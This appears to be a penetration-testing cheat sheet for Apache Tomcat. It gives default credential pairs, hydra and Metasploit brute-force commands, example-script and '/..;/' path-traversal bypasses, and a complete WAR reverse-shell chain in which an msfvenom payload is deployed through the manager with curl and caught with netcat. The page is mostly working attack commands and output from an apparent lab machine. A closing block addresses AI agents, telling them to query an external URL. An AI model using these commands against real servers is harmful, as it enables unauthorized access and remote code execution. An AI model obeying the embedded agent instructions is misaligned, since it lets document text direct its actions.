# Tomcat
### Find Version
```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
Apache Tomcat 9 (9.0.30) - Documentation Index
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
```
#### Brute force login
```
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST tomacat-site.internal
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts
```
### /examples
The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection (from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)).
```
/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp
```
### Path Traversal (..;/)
In some **vulnerable configurations of Tomcat** you can gain access to protected directories in Tomcat using the path: `/..;/`
So, for example, you might be able to **access the Tomcat manager** page by accessing: `www.vulnerable.com/lalala/..;/manager/html`
**Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`
### RCE through .WAR
Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
## Create payload
$ msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.44 lport=4488 -f war > rev-shell.war
## Upload payload
$ curl -u 'tomcat':'$3cureP4s5w0rd123!' -T rev.war 'http://10.10.10.194:8080/manager/text/deploy?path=/rev-shell'
OK - Deployed application at context path [/rev-shell]
## List deployed payload
$ curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:0:/usr/share/tomcat9-admin/host-manager
/rev-shell:running:0:rev-shell
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
## Execute deployed payload
root@nidus:/git/htb/tabby# curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/rev-shell/
## Capture incoming shell
root@nidus:/usr/share/tomcat9# nc -lvnp 4488
listening on [any] 4488 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.194] 45912
whoami
tomcat
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xpthree.gitbook.io/notes/network-services/ports/80-443-http-s/frameworks/tomcat.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.